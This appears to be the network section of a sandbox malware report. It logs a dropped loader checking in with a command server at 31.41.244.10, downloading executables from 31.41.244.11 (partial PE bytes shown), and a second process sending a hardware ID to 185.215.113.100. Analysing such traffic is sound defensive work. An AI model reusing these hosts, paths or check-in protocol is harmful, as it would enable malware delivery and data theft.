Sep 6, 2024 09:58:04.031332970 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:04.754137039 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:04.768570900 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:05.019265890 CEST	456	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 30 39 0d 0a 20 3c 63 3e 31 30 30 30 30 32 36 30 30 30 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 63 62 63 35 61 32 65 61 66 66 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 30 30 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 63 66 64 34 61 62 65 37 62 64 61 36 63 61 37 31 39 36 34 65 34 31 66 30 35 36 66 63 34 39 23 31 30 30 30 30 33 30 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 39 34 32 62 35 63 64 34 66 37 65 33 65 34 37 37 61 62 33 30 32 61 61 39 37 63 32 62 33 65 65 66 33 62 39 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 109 <c>1000026000+++b5937c1a99d5f9df0b5dafc85062384760ac02b4cbc5a2eafffbd97e9c4543b31de15441#1000029001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4cfd4abe7bda6ca71964e41f056fc49#1000030001+++fc8f7c1ed3c0f9c30942b5cd4f7e3e477ab302aa97c2b3eef3b9846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49719	31.41.244.11	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:05.079020023 CEST	54	OUT	GET /steam/random.exe HTTP/1.1 Host: 31.41.244.11
Sep 6, 2024 09:58:05.775950909 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:05 GMT Content-Type: application/octet-stream Content-Length: 1756672 Last-Modified: Fri, 06 Sep 2024 07:18:45 GMT Connection: keep-alive ETag: "66daacd5-1ace00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a2 62 9b e5 e6 03 f5 b6 e6 03 f5 b6 e6 03 f5 b6 89 75 5e b6 fe 03 f5 b6 89 75 6b b6 eb 03 f5 b6 89 75 5f b6 dc 03 f5 b6 ef 7b 76 b6 e5 03 f5 b6 66 7a f4 b7 e4 03 f5 b6 ef 7b 66 b6 e1 03 f5 b6 e6 03 f4 b6 8d 03 f5 b6 89 75 5a b6 f4 03 f5 b6 89 75 68 b6 e7 03 f5 b6 52 69 63 68 e6 03 f5 b6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 4d 8b c8 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 01 00 00 42 22 00 00 00 00 00 00 60 66 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 90 66 00 00 04 00 00 e6 41 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$bu^uku_{vfz{fuZuhRichPELMfB"`f@fA@P#d# #<@.rsrc #L@.idata #L@ ($N@dnbdzjvd`LXP@hwzrywcdPf@.taggant0`f"@
Sep 6, 2024 09:58:05.775965929 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 6, 2024 09:58:05.775979042 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 6, 2024 09:58:05.775991917 CEST	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 6, 2024 09:58:05.776177883 CEST	1236	IN	Data Raw: aa 10 88 7e c4 8f cf cd 72 ec 8d 0e f6 f8 36 04 e6 5b 18 d9 b3 af 03 44 a6 10 d8 28 b4 bf 8b 1e 20 fc 36 ff 52 53 09 7c da 85 f7 45 50 18 40 5e cd 64 e9 85 24 55 a8 26 9b fd 33 84 ee 6d 04 d1 06 39 36 04 fa 69 8a 07 5d 81 e7 44 7b e0 9a 3a 3b 57 Data Ascii: ~r6[D( 6RS\|EP@^d$U&3m96i]D{:;Wv6;bB(=qf?'rjGV`b9KHw3;/;"VhClhMGLx/T}4:Wcr:9mc6# y["jR#~j-TCm
Sep 6, 2024 09:58:05.776200056 CEST	1236	IN	Data Raw: 33 57 91 9e 37 98 36 90 c6 ef c0 4a 7b cc 8a 9c be 6a 35 a9 b2 9d ce 97 24 81 31 57 25 75 33 8e 72 e0 f0 aa 6d e0 c4 9f be f1 32 dc bb 2c ad 66 79 20 84 1c e7 30 3d 17 c0 4e f1 f5 38 74 9c d9 1c 2f 0d e3 02 05 0d a7 8b 50 df 02 2e 31 d7 b8 ef e1 Data Ascii: 3W76J{j5$1W%u3rm2,fy 0=N8t/P.1kw;mIhy\HPQwn-E17Axn[=^2c#-6L/4>6h<0}&D3i5m")2S-
Sep 6, 2024 09:58:05.776211977 CEST	1236	IN	Data Raw: c4 d2 35 f5 38 d7 5c 74 45 45 85 fc 79 0d 21 dc 0d e2 92 36 73 6a 6d ee 15 2d 0b 1f 95 4d d5 5f a0 6b eb 04 d2 21 3a 1b 32 ed c1 64 5f a8 3b df 72 15 81 c3 1c 4c 39 35 7a 11 8d d2 36 54 93 fa 1b 19 0d eb f6 42 1d 24 06 09 3a 03 78 0d e1 c6 e6 43 Data Ascii: 58\tEEy!6sjm-M_k!:2d_;rL95z6TB$:xCdZ.3r-aKr!Vu&5#W{V%qj:;&'Cbm1Y575cVL>m:6^\%hD=672nkTUYv^le{YMKz-b-w>H&
Sep 6, 2024 09:58:05.776222944 CEST	672	IN	Data Raw: 11 6c 03 12 8c 3a 5b 59 e4 27 b5 23 fa 5c 20 8a 86 c5 d0 82 3e 21 f9 23 a2 80 1e 92 8f 09 a2 2d ea 6d f4 98 1e 61 77 5b d0 d1 0a 12 9a 21 df f4 ea 89 d1 da be 5c 61 86 31 58 2d f7 d6 2d 38 9b 2a 5c 3d c7 12 61 b7 c4 46 2d a0 15 26 4d 2d c7 03 42 Data Ascii: l:[Y'#\ >!#-maw[!\a1X--8\=aF-&M-BhrKyU-2U9I^-mZIw!6;BB>g\(#YQOUQ-2#:{B&f)\\| ?;\Mt<&\#.}8@&@n<;]_-m
Sep 6, 2024 09:58:05.776236057 CEST	1236	IN	Data Raw: 3f c9 37 9d 66 5c 0d 03 1a d4 b6 42 47 2b 78 02 0e 35 b1 3e 03 42 90 9d c6 a8 3b 14 2e 2e 3a 43 37 1b 92 92 be 3f 2f 2a 1a 45 3a c0 2b 52 b9 59 d5 4f d5 14 76 5c 2d fa 5e ad 30 07 34 07 01 12 ae 43 34 32 a6 6d 3c bb 8f e4 3b 6f 73 7f cc 15 16 fd Data Ascii: ?7f\BG+x5>B;..:C7?/E:+RYOv\-^04C42m<;os@AgY:Bfa$S9>\$<aD*.!\4\Y%KUQ2\ W.96;'$.&3.r\>e9O2{&$`\UX-z\UJ`nQ-:;W.:%NUa
Sep 6, 2024 09:58:05.776262045 CEST	1236	IN	Data Raw: 56 23 3a 77 04 b0 26 9b 81 5d 97 06 2a ec 3a 51 10 d9 d0 2d 0a f4 5d 96 1e 5c 22 37 7b e2 49 4a d1 c0 f2 ce 03 21 81 0f 0f 3d 58 5d 07 29 3a 2a c6 54 f2 41 83 ac ca 34 ce 21 e1 24 22 3c fd 8e 75 ab 96 2d 7a fd 8a 2b 54 a9 49 2d f6 6d b5 86 31 6f Data Ascii: V#:w&]:Q-]\"7{IJ!=X]):TA4!$"<u-z+TI-m1o5DN;.q;)*%:LY%+-8$.TkwO>r\&r\a'"\'$T./r1\"{ig"=U'ce`C@?N\"JB>c4N-;o4%:55r-
Sep 6, 2024 09:58:05.780939102 CEST	1236	IN	Data Raw: 3c 24 88 81 77 b8 c6 70 7b 1d f5 5a 78 ff d3 89 ea 45 ed 4c ed ed b8 f6 69 54 6a d3 04 ba 8b 1a 66 c1 3e 6f 78 44 47 ab be 15 74 82 a9 0e 45 56 b5 4e fd e3 4a 91 5f dc dc 63 f4 33 9e b4 8a 5b 0b 71 37 7f b2 e0 96 a1 33 d3 69 7c af f8 3a be ea a9 Data Ascii: <$wp{ZxELiTjf>oxDGtEVNJ_c3[q73i\|:bAQBq<Sut1DF89B(Q=`r&~0~%=2V+M#%!4T}pY{BY$R-{*z#{D:Pt"3':k:==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49720	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:08.043541908 CEST	181	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 36 30 30 30 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000026000&unit=246122658369
Sep 6, 2024 09:58:08.750566959 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49721	31.41.244.11	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:08.757496119 CEST	53	OUT	GET /well/random.exe HTTP/1.1 Host: 31.41.244.11
Sep 6, 2024 09:58:09.448220968 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:09 GMT Content-Type: application/octet-stream Content-Length: 917504 Last-Modified: Fri, 06 Sep 2024 07:10:16 GMT Connection: keep-alive ETag: "66daaad8-e0000" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d0 aa da 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 50 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED] Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELf"Pw@`@@@d\|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
Sep 6, 2024 09:58:09.448242903 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
Sep 6, 2024 09:58:09.448250055 CEST	1236	IN	Data Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7 Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY\|#l)\DItv
Sep 6, 2024 09:58:09.448256016 CEST	672	IN	Data Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c Data Ascii: N^VW3DNF\|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
Sep 6, 2024 09:58:09.448261023 CEST	1236	IN	Data Raw: 27 ff d6 53 6a 11 88 47 28 ff d6 53 6a 12 88 47 24 ff d6 88 47 25 5f 5e 5b c3 55 8b ec 51 57 33 ff 8d 45 fc 57 50 57 68 00 20 00 00 89 7d fc ff 15 f0 c5 49 00 8b 45 fc 6a 02 57 57 68 01 20 00 00 a3 94 25 4d 00 ff 15 f0 c5 49 00 5f c9 c3 55 8b ec Data Ascii: 'SjG(SjG$G%_^[UQW3EWPWh }IEjWWh %MI_U=Mt_E%\M%PMXMtIhFM2j3YYuj5%Mjh I\M]3@Usy!xwJxnEP
Sep 6, 2024 09:58:09.448266983 CEST	1236	IN	Data Raw: 33 c9 83 fe 2b 0f 94 c1 8b 44 88 08 66 83 78 08 47 75 42 8d 41 03 89 45 f8 8d 45 fc 53 50 8d 45 e8 50 8d 45 f8 50 57 e8 1b 44 00 00 85 c0 0f 88 a2 06 04 00 8d 4d e8 e8 6e 77 00 00 8b 55 fc e9 25 ff ff ff b9 6c 15 4d 00 e8 63 08 00 00 33 c0 5f 5e Data Ascii: 3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMMW}3E7Nuu3RB3t&u"@f9putBuu6UMEPdEM@M_^[I
Sep 6, 2024 09:58:09.448272943 CEST	1236	IN	Data Raw: 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 f9 01 00 00 8d 4d a8 e8 f1 01 00 00 8d 8d 54 ff ff ff e8 e6 01 00 00 8d 4d 9c e8 de 01 00 00 5f 8b c6 5e 5b c9 c3 83 e8 04 0f 84 ca 03 04 00 83 e8 01 0f 84 Data Ascii: xl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG\|EIEE}`PGdE%}U]
Sep 6, 2024 09:58:09.448280096 CEST	1236	IN	Data Raw: 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 68 18 14 4d 00 8b ce e8 2c 03 00 00 84 c0 0f 84 b1 00 04 00 a0 90 23 4d 00 a2 04 14 4d 00 a0 91 23 4d 00 88 44 24 12 8d 44 24 14 50 8d 84 24 3c 00 01 00 50 Data Ascii: 3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa\|$sY4=MMuW0M=MuD$8PIL$(m_^[]
Sep 6, 2024 09:58:09.448292017 CEST	896	IN	Data Raw: 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 a5 1a 02 00 59 59 85 c0 0f 84 99 fd 03 00 57 68 dc c9 49 00 e8 90 1a 02 00 59 59 85 c0 75 3e 89 1d 00 14 4d 00 38 5d 0b 75 0a c7 05 00 14 4d 00 03 00 00 00 Data Ascii: Wh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MK
Sep 6, 2024 09:58:09.448298931 CEST	1236	IN	Data Raw: 04 8b ce e8 78 76 00 00 8b 55 08 8d 83 84 01 00 00 c1 e2 04 03 c2 89 7d fc 3b f0 74 08 50 8b ce e8 c1 75 00 00 8b 45 08 8d 8b 8c 00 00 00 89 07 8d 45 fc 50 e8 07 00 00 00 5f 5e 5b c9 c2 04 00 55 8b ec 56 6a 08 8b f1 e8 ad ca 01 00 8b 55 08 59 8b Data Ascii: xvU};tPuEEP_^[UVjUYa~uNN^]FHUVEPPh1hIEt3fP7^VVYtf\|F\u3fLF^UVW3FO
Sep 6, 2024 09:58:09.453196049 CEST	1236	IN	Data Raw: 40 f7 d8 1b c0 23 c2 50 e8 f0 5b 00 00 5e 5d c2 04 00 55 8b ec 83 ec 10 53 8b c1 56 57 33 f6 89 45 f8 8b 78 04 89 7d f0 8d 57 ff 85 ff 74 4b 8b 45 08 0f b7 00 89 45 fc 33 db 33 c9 66 85 c0 74 30 8b 45 f8 8b 7d 08 8b 00 0f b7 04 50 89 45 f4 8b 45 Data Ascii: @#P[^]USVW3Ex}WtKEE33ft0E}PEEf9Et#C_fu}!_^[AUSVWh3D$D$SP9uM9uM9uM

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49722	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:11.108283043 CEST	181	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000029001&unit=246122658369
Sep 6, 2024 09:58:11.813432932 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49723	185.215.113.100	80	8008	C:\Users\user\AppData\Roaming\1000026000\76251a0626.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:11.191072941 CEST	90	OUT	GET / HTTP/1.1 Host: 185.215.113.100 Connection: Keep-Alive Cache-Control: no-cache
Sep 6, 2024 09:58:11.956228971 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 6, 2024 09:58:11.966687918 CEST	413	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF Host: 185.215.113.100 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 31 32 36 37 36 39 44 37 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 47 44 42 41 4b 46 43 46 48 43 47 44 47 43 42 41 41 4b 46 2d 2d 0d 0a Data Ascii: ------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="hwid"E6126769D7323653143898------BGDBAKFCFHCGDGCBAAKFContent-Disposition: form-data; name="build"leva------BGDBAKFCFHCGDGCBAAKF--
Sep 6, 2024 09:58:12.224637032 CEST	210	IN	HTTP/1.1 200 OK Date: Fri, 06 Sep 2024 07:58:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49724	31.41.244.11	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:11.830966949 CEST	138	OUT	GET /steam/random.exe HTTP/1.1 Host: 31.41.244.11 If-Modified-Since: Fri, 06 Sep 2024 07:18:45 GMT If-None-Match: "66daacd5-1ace00"
Sep 6, 2024 09:58:12.535512924 CEST	192	IN	HTTP/1.1 304 Not Modified Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:12 GMT Last-Modified: Fri, 06 Sep 2024 07:18:45 GMT Connection: keep-alive ETag: "66daacd5-1ace00"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49727	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:13.538420916 CEST	181	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 33 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000030001&unit=246122658369
Sep 6, 2024 09:58:14.210216045 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49728	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:14.723800898 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:15.399708986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:15.501863956 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:15.731242895 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49738	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:16.170217991 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
